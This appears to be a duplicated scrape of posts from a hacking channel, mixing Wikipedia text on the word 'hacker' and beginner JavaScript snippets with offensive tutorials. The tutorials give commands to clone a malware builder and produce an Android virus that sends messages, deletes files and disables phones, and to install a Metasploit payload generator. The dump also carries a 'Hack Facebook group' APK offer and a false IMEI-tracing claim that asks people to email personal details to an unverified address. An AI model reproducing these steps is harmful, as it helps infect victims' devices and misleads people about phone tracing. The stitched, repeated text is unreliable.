A computer hacker is a computer expert who uses their technical knowledge to overcome a problem.While "hacker" can refer to any skilled computer programmer,the term has become associated in popular culture with a "security hacker",someone who,with their technical knowledge,uses bugs or exploits to break into computer systems.
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Wikipedia
General definition
Reflecting the two types of hackers,there are two definitions of the word "hacker":
anadherent of the technology and programming subculture;see hacker culture.
someonewho is able to subvert computer security.If doing so for malicious purposes,the person can also be called a cracker.[1]
Today,mainstream usage of "hacker" mostly refers to computer criminals,due to the mass media usage of the word since the 1990s.[2] Thisincludes what hacker slang calls "script kiddies",people breaking into computers using programs written by others,with very little knowledge about the way they work.This usage has become so predominant that the general public is largely unaware that different meanings exist.[3] Whilethe self-designation of hobbyists as hackers is generally acknowledged and accepted by computer security hackers,people from the programming subculture consider the computer intrusion related usage incorrect,and emphasize the difference between the two by calling security breakers "crackers" (analogousto a safecracker).
Thecontroversy is usually based on the assertion that the term originally meant someone messing about with something in a positive sense,that is,using playful cleverness to achieve a goal.But then,it is supposed,the meaning of the term shifted over the decades and came to refer to computer criminals.[4]
Asthe security-related usage has spread more widely,the original meaning has become less known.In popular usage and in the media,"computer intruders" or "computer criminals" is the exclusive meaning of the word today.(Forexample,"An Internet 'hacker' broke through state government security systems in March.")In the computer enthusiast (HackerCulture)community,the primary meaning is a complimentary description for a particularly brilliant programmer or technical expert.(Forexample,"Linus Torvalds,the creator of Linux,is considered by some to be a hacker.")A large segment of the technical community insist the latter is the "correct" usage of the word (seethe Jargon File definition below).
Representationin mainstream media
The mainstream media's current usage of the term may be traced back to the early 1980s.When the term was introduced to wider society by the mainstream media in 1983,even those in the computer community referred to computer intrusion as "hacking",although not as the exclusive definition of the word.In reaction to the increasing media use of the term exclusively with the criminal connotation,the computer community began to differentiate their terminology.Alternative terms such as "cracker" were coined in an effort to maintain the distinction between "hackers" within the legitimate programmer community and those performing computer break-ins.Further terms such as "black hat","white hat" and "gray hat" developed when laws against breaking into computers came into effect,to distinguish criminal activities from those activities which were legal.
Representationin network news
However,network news use of the term consistently pertained primarily to the criminal activities,despite the attempt by the technical community to preserve and distinguish the original meaning,so today the mainstream media and general public continue to describe computer criminals,with all levels of technical sophistication,as "hackers" and do not generally make use of the word in any of its non-criminal connotations.Members of the media sometimes seem unaware of the distinction,grouping legitimate "hackers" such as Linus Torvalds and Steve Wozniak along with criminal "crackers".[5]
Asa result,the definition is still the subject of heated controversy.The wider dominance of the pejorative connotation is resented by many who object to the term being taken from their cultural jargon and used negatively,[6] includingthose who have historically preferred to self-identify as hackers.Many advocate using the more recent and nuanced alternate terms when describing criminals and others who negatively take advantage of security flaws in software and hardware.Others prefer to follow common popular usage,arguing that
Reflecting the two types of hackers,there are two definitions of the word "hacker":
anadherent of the technology and programming subculture;see hacker culture.
someonewho is able to subvert computer security.If doing so for malicious purposes,the person can also be called a cracker.[1]
Today,mainstream usage of "hacker" mostly refers to computer criminals,due to the mass media usage of the word since the 1990s.[2] Thisincludes what hacker slang calls "script kiddies",people breaking into computers using programs written by others,with very little knowledge about the way they work.This usage has become so predominant that the general public is largely unaware that different meanings exist.[3] Whilethe self-designation of hobbyists as hackers is generally acknowledged and accepted by computer security hackers,people from the programming subculture consider the computer intrusion related usage incorrect,and emphasize the difference between the two by calling security breakers "crackers" (analogousto a safecracker).
Thecontroversy is usually based on the assertion that the term originally meant someone messing about with something in a positive sense,that is,using playful cleverness to achieve a goal.But then,it is supposed,the meaning of the term shifted over the decades and came to refer to computer criminals.[4]
Asthe security-related usage has spread more widely,the original meaning has become less known.In popular usage and in the media,"computer intruders" or "computer criminals" is the exclusive meaning of the word today.(Forexample,"An Internet 'hacker' broke through state government security systems in March.")In the computer enthusiast (HackerCulture)community,the primary meaning is a complimentary description for a particularly brilliant programmer or technical expert.(Forexample,"Linus Torvalds,the creator of Linux,is considered by some to be a hacker.")A large segment of the technical community insist the latter is the "correct" usage of the word (seethe Jargon File definition below).
Representationin mainstream media
The mainstream media's current usage of the term may be traced back to the early 1980s.When the term was introduced to wider society by the mainstream media in 1983,even those in the computer community referred to computer intrusion as "hacking",although not as the exclusive definition of the word.In reaction to the increasing media use of the term exclusively with the criminal connotation,the computer community began to differentiate their terminology.Alternative terms such as "cracker" were coined in an effort to maintain the distinction between "hackers" within the legitimate programmer community and those performing computer break-ins.Further terms such as "black hat","white hat" and "gray hat" developed when laws against breaking into computers came into effect,to distinguish criminal activities from those activities which were legal.
Representationin network news
However,network news use of the term consistently pertained primarily to the criminal activities,despite the attempt by the technical community to preserve and distinguish the original meaning,so today the mainstream media and general public continue to describe computer criminals,with all levels of technical sophistication,as "hackers" and do not generally make use of the word in any of its non-criminal connotations.Members of the media sometimes seem unaware of the distinction,grouping legitimate "hackers" such as Linus Torvalds and Steve Wozniak along with criminal "crackers".[5]
Asa result,the definition is still the subject of heated controversy.The wider dominance of the pejorative connotation is resented by many who object to the term being taken from their cultural jargon and used negatively,[6] includingthose who have historically preferred to self-identify as hackers.Many advocate using the more recent and nuanced alternate terms when describing criminals and others who negatively take advantage of security flaws in software and hardware.Others prefer to follow common popular usage,arguing that
the positive form is confusing and unlikely to become widespread in the general public.A minority still use the term in both senses despite the controversy,leaving context to clarify (orleave ambiguous)which meaning is intended.
However,because the positive definition of hacker was widely used as the predominant form for many years before the negative definition was popularized,"hacker" can therefore be seen as a shibboleth,identifying those who use the technically-oriented sense (asopposed to the exclusively intrusion-oriented sense)as members of the computing community.On the other hand,due to the variety of industries software designers may find themselves in,many prefer not to be referred to as hackers because the word holds a negative denotation in many of those industries.
Apossible middle ground position has been suggested,based on the observation that "hacking" describes a collection of skills and tools which are used by hackers of both descriptions for differing reasons.The analogy is made to locksmithing,specifically picking locks,which is a skill which can be used for good or evil.The primary weakness of this analogy is the inclusion of script kiddies in the popular usage of "hacker,"despite their lack of an underlying skill and knowledge base.
Sometimes,"hacker" is simply used synonymously with "geek":"A true hacker is not a group person.He's a person who loves to stay up all night,he and the machine in a love-hate relationship...They're kids who tended to be brilliant but not very interested in conventional goals[...]It's a term of derision and also the ultimate compliment."[7]
FredShapiro thinks that "the common theory that 'hacker' originally was a benign term and the malicious connotations of the word were a later perversion is untrue."He found that the malicious connotations were already present at MIT in 1963 (quoting TheTech,an MIT student newspaper),and at that time referred to unauthorized users of the telephone network,[8][9] thatis,the phreaker movement that developed into the computer security hacker subculture of today.
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However,because the positive definition of hacker was widely used as the predominant form for many years before the negative definition was popularized,"hacker" can therefore be seen as a shibboleth,identifying those who use the technically-oriented sense (asopposed to the exclusively intrusion-oriented sense)as members of the computing community.On the other hand,due to the variety of industries software designers may find themselves in,many prefer not to be referred to as hackers because the word holds a negative denotation in many of those industries.
Apossible middle ground position has been suggested,based on the observation that "hacking" describes a collection of skills and tools which are used by hackers of both descriptions for differing reasons.The analogy is made to locksmithing,specifically picking locks,which is a skill which can be used for good or evil.The primary weakness of this analogy is the inclusion of script kiddies in the popular usage of "hacker,"despite their lack of an underlying skill and knowledge base.
Sometimes,"hacker" is simply used synonymously with "geek":"A true hacker is not a group person.He's a person who loves to stay up all night,he and the machine in a love-hate relationship...They're kids who tended to be brilliant but not very interested in conventional goals[...]It's a term of derision and also the ultimate compliment."[7]
FredShapiro thinks that "the common theory that 'hacker' originally was a benign term and the malicious connotations of the word were a later perversion is untrue."He found that the malicious connotations were already present at MIT in 1963 (quoting TheTech,an MIT student newspaper),and at that time referred to unauthorized users of the telephone network,[8][9] thatis,the phreaker movement that developed into the computer security hacker subculture of today.
Wikipedia
Hacker culture
Main article: Hackerculture
Hacker culture is an idea derived from a community of enthusiast computer programmers and systems designers in the 1960s around the Massachusetts Institute of Technology's (MIT's) TechModel Railroad Club (TMRC)[10] andthe MIT Artificial Intelligence Laboratory.[11]Theconcept expanded to the hobbyist home computing community,focusing on hardware in the late 1970s (e.g.the Homebrew Computer Club)[12] andon software (videogames,[13] softwarecracking,the demoscene)in the 1980s/1990s.Later,this would go on to encompass many new definitions such as art,and life hacking.
Securityrelated hacking
Main article: Securityhacker
Security hackers are people involved with circumvention of computer security.Among security hackers,there are several types,including:
Whitehat hacker
White hats are hackers who work to keep data safe from other hackers by finding system vulnerabilities that can be mitigated.White hats are usually employed by the target system's owner and are typically paid (sometimesquite well)for their work.Their work is not illegal because it is done with the system owner's consent.
Blackhat hacker
Black hats or crackers are hackers with malicious intentions.They often steal,exploit,and sell data,and are usually motivated by personal gain.Their work is usually illegal.A cracker is like a black hat hacker,[14] butis specifically someone who is very skilled and tries via hacking to make profits or to benefit,not just to vandalize.Crackers find exploits for system vulnerabilities and often use them to their advantage by either selling the fix to the system owner or selling the exploit to other black hat hackers,who in turn use it to steal information or gain royalties.
Greyhat hacker
Grey hats include those who hack for fun or to troll.They may both fix and exploit vulnerabilities,but usually not for financial gain.Even if not malicious,their work can still be illegal,if done without the target system owner's consent,and grey hats are usually associated with black hat hackers
Wikipedia
Main article: Hackerculture
Hacker culture is an idea derived from a community of enthusiast computer programmers and systems designers in the 1960s around the Massachusetts Institute of Technology's (MIT's) TechModel Railroad Club (TMRC)[10] andthe MIT Artificial Intelligence Laboratory.[11]Theconcept expanded to the hobbyist home computing community,focusing on hardware in the late 1970s (e.g.the Homebrew Computer Club)[12] andon software (videogames,[13] softwarecracking,the demoscene)in the 1980s/1990s.Later,this would go on to encompass many new definitions such as art,and life hacking.
Securityrelated hacking
Main article: Securityhacker
Security hackers are people involved with circumvention of computer security.Among security hackers,there are several types,including:
Whitehat hacker
White hats are hackers who work to keep data safe from other hackers by finding system vulnerabilities that can be mitigated.White hats are usually employed by the target system's owner and are typically paid (sometimesquite well)for their work.Their work is not illegal because it is done with the system owner's consent.
Blackhat hacker
Black hats or crackers are hackers with malicious intentions.They often steal,exploit,and sell data,and are usually motivated by personal gain.Their work is usually illegal.A cracker is like a black hat hacker,[14] butis specifically someone who is very skilled and tries via hacking to make profits or to benefit,not just to vandalize.Crackers find exploits for system vulnerabilities and often use them to their advantage by either selling the fix to the system owner or selling the exploit to other black hat hackers,who in turn use it to steal information or gain royalties.
Greyhat hacker
Grey hats include those who hack for fun or to troll.They may both fix and exploit vulnerabilities,but usually not for financial gain.Even if not malicious,their work can still be illegal,if done without the target system owner's consent,and grey hats are usually associated with black hat hackers
Wikipedia
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🔴 UNLOCK WINDOW COMPUTERS FROM📲 ANDROID/IPHONE 🔴
✍Step 1. First of all, head to the Settings > Devices.
✍Step 2. Under the devices, click on the ‘Bluetooth & other devices’ and enable Bluetooth from there.
✍Step 3. You need to pair your smartphone with the PC through Bluetooth.
✍Step 4. Once paired, head to the Settings > Accounts.
✍Step 5. Now select the ✅‘Sign in options’ from the left-hand side menu and enable ‘Dynamic Lock’
That’s it, you are done❗️
This is how you can use the dynamic lock feature to lock and unlock your Windows 10 computer.
✍Step 1. First of all, head to the Settings > Devices.
✍Step 2. Under the devices, click on the ‘Bluetooth & other devices’ and enable Bluetooth from there.
✍Step 3. You need to pair your smartphone with the PC through Bluetooth.
✍Step 4. Once paired, head to the Settings > Accounts.
✍Step 5. Now select the ✅‘Sign in options’ from the left-hand side menu and enable ‘Dynamic Lock’
That’s it, you are done❗️
This is how you can use the dynamic lock feature to lock and unlock your Windows 10 computer.
1.Program to print hello world
<html>
<body>
<script type="text/javascript">
document.write("helloWorld");
</script>
</body>
</html>
<html>
<body>
<script type="text/javascript">
document.write("helloWorld");
</script>
</body>
</html>
JavaScript Tutorials:
2.2.Program to swap two strings.
<html>
<head>
<script> function swap()
{
var txt = document.getElementById('t1').value;
document.getElementById('t1').value= document.getElementById('t2').value; document.getElementById('t2').value= txt;
}
</script>
</head>
<body>
<input type="text" id="t1"> <input type="text" id="t2">
<br>
<input type="button" value="Swap" onclick="swap()">
</body>
</html>
2.2.Program to swap two strings.
<html>
<head>
<script> function swap()
{
var txt = document.getElementById('t1').value;
document.getElementById('t1').value= document.getElementById('t2').value; document.getElementById('t2').value= txt;
}
</script>
</head>
<body>
<input type="text" id="t1"> <input type="text" id="t2">
<br>
<input type="button" value="Swap" onclick="swap()">
</body>
</html>
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Hack Facebook gurop termux
@kingz_hackers
@kingz_hackers
If you want to learn program apps on your phone give me like but if you don't want is give me dislike
base.apk
13.9 MB
App name Astronomy
Code java
Builder Natnael sendeku or the unknown hat
Mb 13.9
Warning this app is not uploaded on play store don't upload
Code java
Builder Natnael sendeku or the unknown hat
Mb 13.9
Warning this app is not uploaded on play store don't upload
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3. Program to add text to a particular division in the page.
<script>
function add1()
{
document.getElementById('div1').innerHTML = document.getElementById('t1').value
}
</script>
<input type="text" id="t1"> <br> <input type="button" value="Click" onclick="add1()"> <div id="div1">
</div>
<script>
function add1()
{
document.getElementById('div1').innerHTML = document.getElementById('t1').value
}
</script>
<input type="text" id="t1"> <br> <input type="button" value="Click" onclick="add1()"> <div id="div1">
</div>
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4. Program to change style of a text at runtime.
<script>
function chngstyle()
{
document.getElementById('div1').style.color = "Red"
document.getElementById('div1').style.backgroundColor = "yellow"
document.getElementById('div1').style.width = "100"
document.getElementById('div1').style.height = "100"
}
</script>
<div id="div1"> Welcome to all </div>
<input type="button" value="Click" onclick="chngstyle()">
<script>
function chngstyle()
{
document.getElementById('div1').style.color = "Red"
document.getElementById('div1').style.backgroundColor = "yellow"
document.getElementById('div1').style.width = "100"
document.getElementById('div1').style.height = "100"
}
</script>
<div id="div1"> Welcome to all </div>
<input type="button" value="Click" onclick="chngstyle()">
Today i am gonna show you how to make your own virus👾 by termux
First install it👇
$pkg update && pkg pkg upgrade
$apt update && apt upgrade
$pkg install git
$pkg install python2
$pkg install ruby
$gem install locat
And setting>apps>termux permission>storage
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Follow this command
$git clone https://github.com/Mrdarktutorial/Malicious.git
$cd Malicious
$ls
$chmod +x *
$pip2 install -r requirements.txt
$ls
$python2 malicious.py
----------------------------------------choose os but to day i'm gonna show you on android so write number 1
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Choose a virus that you want but to day i am gonna show you by number 15 or Elite this virus can send a message, delete files and it can stop mobile its harm full virus
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1 after this
$ls
$cd android
$ls
$cp Elite.apk /sdcard
⚠️warning if you install the the app on your phone your mobile is going to die!!!!!!
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🛑we will not take a risk
keep legal don't illgale
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First install it👇
$pkg update && pkg pkg upgrade
$apt update && apt upgrade
$pkg install git
$pkg install python2
$pkg install ruby
$gem install locat
And setting>apps>termux permission>storage
---------------------------------------------
Follow this command
$git clone https://github.com/Mrdarktutorial/Malicious.git
$cd Malicious
$ls
$chmod +x *
$pip2 install -r requirements.txt
$ls
$python2 malicious.py
----------------------------------------choose os but to day i'm gonna show you on android so write number 1
----------------------------------------------
Choose a virus that you want but to day i am gonna show you by number 15 or Elite this virus can send a message, delete files and it can stop mobile its harm full virus
-------------------------------------------
1 after this
$ls
$cd android
$ls
$cp Elite.apk /sdcard
⚠️warning if you install the the app on your phone your mobile is going to die!!!!!!
----------------------------------------------
🛑we will not take a risk
keep legal don't illgale
@Allhackingtutorials
Share and support
What is Github?
To understand GitHub, you must first have an understanding of Git. Git is an open-source version control system that was started by Linus Torvalds—the same person who created Linux. Git is similar to other version control systems—Subversion, CVS, and Mercurial to name a few.
https://www.howtogeek.com/180167/htg-explains-what-is-github-and-what-do-geeks-use-it-for/
To understand GitHub, you must first have an understanding of Git. Git is an open-source version control system that was started by Linus Torvalds—the same person who created Linux. Git is similar to other version control systems—Subversion, CVS, and Mercurial to name a few.
https://www.howtogeek.com/180167/htg-explains-what-is-github-and-what-do-geeks-use-it-for/
How-To Geek
What Is GitHub, and What Is It Used For?
GitHub is a website and service that we hear geeks rave about all the time, yet a lot of people don’t really understand what it does. Want to know what all the GitHub hubbub is about? Read on to find out.
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HOW TO TRACE A MISSING OR STOLEN PHONE
If you lose your mobile phone, you can trace it without going to the police.
Most of us always fear that our phones may be stolen at any time.
Each phone carries a unique
IMEI no. i.e. International Mobile Equipment Identity No which can be used to track it anywhere in the world.
This is how it works:
1. Dial *#06# from your mobile.
2. Your mobile phone shows a unique 15 digit.
3. Note down this number at a secure place except in your mobile phone itself as this is the number which will help trace your phone in case of theft.
4. Once stolen, just E-mail this 15 digit IMEI No. to cop@vsnl.net with details as stated below:
Your name:____________________
Address:______________________
Phone model:_________________
Make:_________________________
Last used No.:_________________
E-mail for communication:_____
Missed date:___________________
IMEI No :_______________________
5.Your Mobile will be traced within next 24 hours via a complex system of GPRS and internet, You will find where your hand set is being operated and the new user's No. will be sent to your email.
6. After this, you can inform the Police with the details you got
HOW TO TRACE A MISSING OR STOLEN PHONE
If you lose your mobile phone, you can trace it without going to the police.
Most of us always fear that our phones may be stolen at any time.
Each phone carries a unique
IMEI no. i.e. International Mobile Equipment Identity No which can be used to track it anywhere in the world.
This is how it works:
1. Dial *#06# from your mobile.
2. Your mobile phone shows a unique 15 digit.
3. Note down this number at a secure place except in your mobile phone itself as this is the number which will help trace your phone in case of theft.
4. Once stolen, just E-mail this 15 digit IMEI No. to cop@vsnl.net with details as stated below:
Your name:____________________
Address:______________________
Phone model:_________________
Make:_________________________
Last used No.:_________________
E-mail for communication:_____
Missed date:___________________
IMEI No :_______________________
5.Your Mobile will be traced within next 24 hours via a complex system of GPRS and internet, You will find where your hand set is being operated and the new user's No. will be sent to your email.
6. After this, you can inform the Police with the details you got
🌀 Generate metasploit Payloads in Easiest way using TM venom specially for Termux users @kingz_hackers 🌀
[!] Tmvenom :- Tmvenom is a python based tool specially designed for Termux users.This payload generates some basic payloads using metasploit-framework so You must install metasploit framework on your Termux.This tool works both rooted and non rooted devices.This is very helpfull for beginners.
♉️ Requirments:-
1. Termux APp
2. metasploit-framework
✳️ Installation :
$ apt update
$ apt upgrade
$ apt install git
$ apt install python2
$ git clone https://github.com/TechnicalMujeeb/tmvenom
$ cd tmvenom
$ chmod +x *
$ sh install.sh
✳️ Usage :
$ python2 tmvenom.py
&
$ python2 tmvenom2.py
Now select payload options and you can easily generates payloads.
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[!] Tmvenom :- Tmvenom is a python based tool specially designed for Termux users.This payload generates some basic payloads using metasploit-framework so You must install metasploit framework on your Termux.This tool works both rooted and non rooted devices.This is very helpfull for beginners.
♉️ Requirments:-
1. Termux APp
2. metasploit-framework
✳️ Installation :
$ apt update
$ apt upgrade
$ apt install git
$ apt install python2
$ git clone https://github.com/TechnicalMujeeb/tmvenom
$ cd tmvenom
$ chmod +x *
$ sh install.sh
✳️ Usage :
$ python2 tmvenom.py
&
$ python2 tmvenom2.py
Now select payload options and you can easily generates payloads.
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